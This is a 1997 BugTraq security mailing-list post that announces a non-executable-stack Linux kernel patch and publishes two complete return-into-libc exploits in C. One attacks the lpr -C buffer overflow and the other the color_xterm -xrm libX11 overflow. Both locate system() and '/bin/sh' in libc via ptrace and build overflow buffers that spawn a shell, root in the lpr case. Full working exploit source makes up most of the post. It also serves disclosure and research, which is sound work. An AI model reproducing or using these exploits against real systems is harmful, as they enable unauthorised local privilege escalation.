To: BugTraq

Subject: Getting around non-executable stack (and fix)

Date: Sun Aug 10 1997 13:29:46

Author: Solar Designer < solar@false.com >

Message-ID: <199708102029.RAA05108@false.com>

 

 

Hello!

 

I finally decided to post a return-into-libc overflow exploit. This method

has been discussed on linux-kernel list a few months ago (special thanks to

Pavel Machek), but there was still no exploit. I'll start by speaking about

the fix, you can find the exploits (local only) below.

 

[ I recommend that you read the entire message even if you aren't running

Linux since a lot of the things described here are applicable to other

systems as well (perhaps someone will finally exploit those overflows in

Digital UNIX discussed here last year?). Also, this method might sometimes

be better than usual one (with shellcode) even if the stack is executable. ]

 

You can find the fixed version of my non-executable stack Linux kernel patch

at http://www.false.com/security/linux-stack/.

 

The problem is fixed by changing the address shared libraries are mmap()ed

at in such a way so it always contains a zero byte. With most vulnerabilities

the overflow is done with an ASCIIZ string, so this prevents the attacker

from passing parameters to the function, and from filling the buffer with

a pattern (requires to know the exact offset of the return address). I admit

someone might still find a libc function with no parameters (this also has

to be a single function, you can't call several of them in a row) that does

enough harm, and find the exact offset of the return address. However, this

gets quite complicated, especially for remote exploits, and especially for

those where you have to guess from the first try (and you also need to guess

the address in libc). So, like before, fix known vulnerabilities, and use

the patch to add an extra layer of security against those yet unknown.

 

I also fixed a bug with the binary header flag which allowed local users to

bypass the patch. Thanks to retch for reporting.

 

And one more good thing: I added a symlink-in-/tmp fix, originally by Andrew

Tridgell. I changed it to prevent from using hard links too, by simply not

allowing non-root users to create hard links to files they don't own, in +t

directories. This seems to be the desired behavior anyway, since otherwise

users couldn't remove such links they just created. I also added exploit

attempt logging, this code is shared with the non-executable stack stuff,

and was the reason to make it a single patch instead of two separate ones.

You can enable them separately anyway.

 

And now here goes the exploit for the well-known old overflow in lpr. This

one is simple, so it looks like a good starting point. Note: it doesn't

contain any assembly code, there's only a NOP opcode, but this one will

most likely not be used, it's for the case when system() is occasionally

at a 256 byte boundary. The exploit also doesn't have any fixed addresses.

Be sure to read comments in the exploit before you look at the next one.

 

>-- lpr.c --<

 

/*

* /usr/bin/lpr buffer overflow exploit for Linux with non-executable stack

* Copyright (c) 1997 by Solar Designer

*/

#include <stdio.h>

#include <unistd.h>

#include <string.h>

#include <stdlib.h>

#include <signal.h>

#include <setjmp.h>

#include <sys/ptrace.h>

#include <sys/types.h>

#include <sys/wait.h>

 

#define SIZE 1200 /* Amount of data to overflow with */

#define ALIGNMENT 11 /* 0, 8, 1..3, 9..11 */

 

#define ADDR_MASK 0xFF000000

 

char buf[SIZE];

int *ptr;

 

int pid, pc, shell, step;

int started = 0;

jmp_buf env;

 

void handler() {

started++;

}

 

/* SIGSEGV handler, to search in libc */

void fault() {

if (step < 0) {

/* Change the search direction */

longjmp(env, 1);

} else {

/* The search failed in both directions */

puts("\"/bin/sh\" not found, bad luck");

exit(1);

}

}

 

void error(char *fn) {

perror(fn);

if (pid > 0) kill(pid, SIGKILL);

exit(1);

}

 

void main() {

signal(SIGUSR1, handler);

 

/* Create a child process to trace */

if ((pid = fork()) < 0) error("fork");

 

if (!pid) {

/* Send the parent a signal, so it starts tracing */

kill(getppid(), SIGUSR1);

/* A loop since the parent may not start tracing immediately */

while (1) system("");

}

 

/* Wait until the child tells us the next library call will be system() */

while (!started);

 

if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");

 

/* Single step the child until it gets out of system() */

do {

waitpid(pid, NULL, WUNTRACED);

pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);

if (pc == -1) error("PTRACE_PEEKUSR");

if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");

} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));

 

/* Single step the child until it calls system() again */

do {

waitpid(pid, NULL, WUNTRACED);

pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);

if (pc == -1) error("PTRACE_PEEKUSR");

if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");

} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));

 

/* Kill the child, we don't need it any more */

if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");

pid = 0;

 

printf("system() found at: %08x\n", pc);

 

/* Let's hope there's an extra NOP if system() is 256 byte aligned */

if (!(pc & 0xFF))

if (*(unsigned char *)--pc != 0x90) pc = 0;

 

/* There's no easy workaround for these (except for using another function) */

if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {

puts("Zero bytes in address, bad luck");

exit(1);

}

 

/*

* Search for a "/bin/sh" in libc until we find a copy with no zero bytes

* in its address. To avoid specifying the actual address that libc is

* mmap()ed to we search from the address of system() in both directions

* until a SIGSEGV is generated.

*/

if (setjmp(env)) step = 1; else step = -1;

shell = pc;

signal(SIGSEGV, fault);

do

while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;

while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));

signal(SIGSEGV, SIG_DFL);

 

printf("\"/bin/sh\" found at: %08x\n", shell);

 

/*

* When returning into system() the stack should look like:

* pointer to "/bin/sh"

* return address placeholder

* stack pointer -> pointer to system()

*

* The buffer could be filled with this 12 byte pattern, but then we would

* need to try up to 12 values for the alignment. That's why a 16 byte pattern

* is used instead:

* pointer to "/bin/sh"

* pointer to "/bin/sh"

* stack pointer (case 1) -> pointer to system()

* stack pointer (case 2) -> pointer to system()

*

* Any of the two stack pointer values will do, and only up to 8 values for

* the alignment need to be tried.

*/

memset(buf, 'x', ALIGNMENT);

ptr = (int *)(buf + ALIGNMENT);

while ((char *)ptr < buf + SIZE - 4*sizeof(int)) {

*ptr++ = pc; *ptr++ = pc;

*ptr++ = shell; *ptr++ = shell;

}

buf[SIZE - 1] = 0;

 

execl("/usr/bin/lpr", "lpr", "-C", buf, NULL);

error("execl");

}

 

>-- lpr.c --<

 

The exploit above will crash after you exit the shell. This can be fixed by

using a 12 byte pattern (like described in the comment), and setting the

return address to point to exit() (we would need to find it first). This

would however increase the number of possible alignment values to try from

8 to 12, so I don't do it.

 

Now, a more complicated exploit, for the -xrm libX11 overflow. It has been

tested with color_xterm from Slackware 3.1. Will also work on other xterms

(tested with xterm and nxterm from RedHat 4.2), but providing a user shell

(not root), since these temporarily give up their privileges, and an extra

setuid() call would be required.

 

Actually, using this method it is possible to call two functions in a row

if the first one has exactly one parameter. The stack should look like this:

 

pointer to "/bin/sh"

pointer to the UID (usually to 0)

pointer to system()

stack pointer -> pointer to setuid()

 

This will require up to 16 values for the alignment. In this case, setuid()

will return into system(), and while system() is running the pointer to UID

will be at the place where system()'s return address should normally be, so

(again) the thing will crash after you exit the shell (but no solution this

time; who cares anyway?). I leave this setuid() stuff as an exercise for the

reader.

 

Another thing specific to this exploit is that GetDatabase() in libX11 uses

its parameter right before returning, so if we overwrite the return address

and a few bytes after it (like normal pattern filling would do), the exploit

wouldn't work. That was the reason the -xrm exploits posted were not stable,

and required to adjust the size exactly. With returning into libc, this was

not possible at all, since parameters to libc function should be right after

the return address. That's why I do a trick similar to my SuperProbe exploit:

overwrite a pointer to a structure that has a function pointer in it (their

function also has exactly one parameter, I was extremely lucky here again).

 

This trick requires three separate buffers filled with different patterns.

The first buffer is what I overflow with, while the two others are put onto

the stack separately (to make them larger). Again, there's no correct return

address from system(), and a pointer to some place on the stack is there.

This makes it behave quite funny when you exit the shell: an exploit attempt

is logged (when running my patch), since system() returns onto the stack. ;^)

You can just kill the vulnerable program you're running from instead of

exiting the shell if this is undesired.

 

Note that you have to link the exploit with the same shared libraries that

the vulnerable program. Also, it might be required to add 4 to ALIGNMENT2 if

the exploit doesn't work, even if it worked when running as another user...

 

>-- cx.c --<

 

/*

* color_xterm buffer overflow exploit for Linux with non-executable stack

* Copyright (c) 1997 by Solar Designer

*

* Compile:

* gcc cx.c -o cx -L/usr/X11/lib \

* `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//`

*

* Run:

* $ ./cx

* system() found at: 401553b0

* "/bin/sh" found at: 401bfa3d

* bash# exit

* Segmentation fault

*/

#include <stdio.h>

#include <unistd.h>

#include <string.h>

#include <stdlib.h>

#include <signal.h>

#include <setjmp.h>

#include <sys/ptrace.h>

#include <sys/types.h>

#include <sys/wait.h>

 

#define SIZE1 1200 /* Amount of data to overflow with */

#define ALIGNMENT1 0 /* 0..3 */

#define OFFSET 22000 /* Structure array offset */

#define SIZE2 16000 /* Structure array size */

#define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */

#define SIZE3 SIZE2

#define ALIGNMENT3 (ALIGNMENT2 & 3)

 

#define ADDR_MASK 0xFF000000

 

char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2];

int *ptr;

 

int pid, pc, shell, step;

int started = 0;

jmp_buf env;

 

void handler() {

started++;

}

 

/* SIGSEGV handler, to search in libc */

void fault() {

if (step < 0) {

/* Change the search direction */

longjmp(env, 1);

} else {

/* The search failed in both directions */

puts("\"/bin/sh\" not found, bad luck");

exit(1);

}

}

 

void error(char *fn) {

perror(fn);

if (pid > 0) kill(pid, SIGKILL);

exit(1);

}

 

int nz(int value) {

if (!(value & 0xFF)) value |= 8;

if (!(value & 0xFF00)) value |= 0x100;

 

return value;

}

 

void main() {

/*

* A portable way to get the stack pointer value; why do other exploits use

* an assembly instruction here?!

*/

int sp = (int)&sp;

 

signal(SIGUSR1, handler);

 

/* Create a child process to trace */

if ((pid = fork()) < 0) error("fork");

 

if (!pid) {

/* Send the parent a signal, so it starts tracing */

kill(getppid(), SIGUSR1);

/* A loop since the parent may not start tracing immediately */

while (1) system("");

}

 

/* Wait until the child tells us the next library call will be system() */

while (!started);

 

if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");

 

/* Single step the child until it gets out of system() */

do {

waitpid(pid, NULL, WUNTRACED);

pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);

if (pc == -1) error("PTRACE_PEEKUSR");

if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");

} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));

 

/* Single step the child until it calls system() again */

do {

waitpid(pid, NULL, WUNTRACED);

pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);

if (pc == -1) error("PTRACE_PEEKUSR");

if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");

} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));

 

/* Kill the child, we don't need it any more */

if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");

pid = 0;

 

printf("system() found at: %08x\n", pc);

 

/* Let's hope there's an extra NOP if system() is 256 byte aligned */

if (!(pc & 0xFF))

if (*(unsigned char *)--pc != 0x90) pc = 0;

 

/* There's no easy workaround for these (except for using another function) */

if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {

puts("Zero bytes in address, bad luck");

exit(1);

}

 

/*

* Search for a "/bin/sh" in libc until we find a copy with no zero bytes

* in its address. To avoid specifying the actual address that libc is

* mmap()ed to we search from the address of system() in both directions

* until a SIGSEGV is generated.

*/

if (setjmp(env)) step = 1; else step = -1;

shell = pc;

signal(SIGSEGV, fault);

do

while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;

while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));

signal(SIGSEGV, SIG_DFL);

 

printf("\"/bin/sh\" found at: %08x\n", shell);

 

/* buf1 (which we overflow with) is filled with pointers to buf2 */

memset(buf1, 'x', ALIGNMENT1);

ptr = (int *)(buf1 + ALIGNMENT1);

while ((char *)ptr < buf1 + SIZE1 - sizeof(int))

*ptr++ = nz(sp - OFFSET); /* db */

buf1[SIZE1 - 1] = 0;

 

/* buf2 is filled with pointers to "/bin/sh" and to buf3 */

memset(buf2, 'x', SIZE2 + SIZE3);

ptr = (int *)(buf2 + ALIGNMENT2);

while ((char *)ptr < buf2 + SIZE2) {

*ptr++ = shell; /* db->mbstate */

*ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */

}

 

/* buf3 is filled with pointers to system() */

ptr = (int *)(buf3 + ALIGNMENT3);

while ((char *)ptr < buf3 + SIZE3 - sizeof(int))

*ptr++ = pc; /* db->methods->mbfinish */

buf3[SIZE3 - 1] = 0;

 

/* Put buf2 and buf3 on the stack */

setenv("BUFFER", buf2, 1);

 

/* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */

execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL);

error("execl");

}

 

>-- cx.c --<

 

That's all for now.

I hope I managed to prove that exploiting buffer overflows should be an art.

 

Signed,

Solar Designer